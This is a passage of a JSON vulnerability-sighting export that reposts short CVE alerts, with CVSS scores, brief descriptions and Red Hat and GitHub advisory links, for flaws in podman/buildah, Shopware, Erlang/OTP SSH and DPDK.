https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "fca0cf4b-c09f-44fa-bf92-00204ac8daf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1707", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "f9706c9d-e428-4b76-8dd5-794e73dd6d15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3577", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "d58a35f9-bc2b-4bec-a5de-66eb32244d5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0830", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "52a9934e-21f3-48d8-8f62-a18a99306e54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8G35-7RMW-7F59", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12139", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27892\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Shopware prior to version 6.5.8.13 is affected by a SQL injection vulnerability in the /api/search/order endpoint. NOTE: this issue exists because of a CVE-2024-22406 and CVE-2024-42357 regression.\n\ud83d\udccf Published: 2025-04-15T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-16T18:32:23.303Z\n\ud83d\udd17 References:\n1. https://github.com/shopware/shopware/security/advisories/GHSA-8g35-7rmw-7f59\n2. https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-001/", "creation_timestamp": "2025-04-16T18:56:18.000000Z"}, {"uuid": "2577a4ca-9ed8-47a5-afd1-3f1fda109e2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12169", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32433\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.\n\ud83d\udccf Published: 2025-04-16T21:34:37.457Z\n\ud83d\udccf Modified: 2025-04-16T22:03:46.067Z\n\ud83d\udd17 References:\n1. https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\n2. https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12\n3. https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f\n4. https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891", "creation_timestamp": "2025-04-16T22:57:51.000000Z"}, {"uuid": "db0c3b9a-6c28-4792-8f63-d8e3f0966bc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-379Q-355J-W6RJ", "type": "seen", "source": "Telegram/FpDGAESLT2b6cAqL19jI0amMTjRd3R14Wu3P5pTmHCNxdqI", "content": "", "creation_timestamp": "2026-01-07T23:09:29.000000Z"}, {"uuid": "430c5243-1467-43d5-99db-abf75d2474b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RGJQ-4Q58-M3Q8", "type": "seen", "source": "Telegram/FpDGAESLT2b6cAqL19jI0amMTjRd3R14Wu3P5pTmHCNxdqI", "content": "", "creation_timestamp": "2026-01-07T23:09:29.000000Z"}, {"uuid": "26986be4-a1ba-4a78-a55a-25583a165ee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7VHP-VF5G-R2FW", "type": "seen", "source": "Telegram/FpDGAESLT2b6cAqL19jI0amMTjRd3R14Wu3P5pTmHCNxdqI", "content": "", "creation_timestamp": "2026-01-07T23:09:29.000000Z"}, {"uuid": "e0eda8b1-e1e6-4b46-ba94-33117799c4a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0221", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "db946edc-23f2-49bf-948d-a27498698da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0923", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "32227ac4-03ac-4e8d-ac4d-8482b1486655", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0208", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "c7c79f89-1039-4520-b909-e6bc89955d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0222", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "59873764-9059-42ae-91c1-24988e66d154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0210", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "53d8a793-33af-4277-bcc9-7b0ed3d102ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0220", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "16c6f3fe-1910-4d73-8f96-cf252ebe0cbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0209", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "c79956c0-d50e-4dfd-8725-9e7aef101f04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3965", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "98d07fc7-af5e-45d3-b366-ff69e02f5f7c", "vulnerability_lookup_origin": 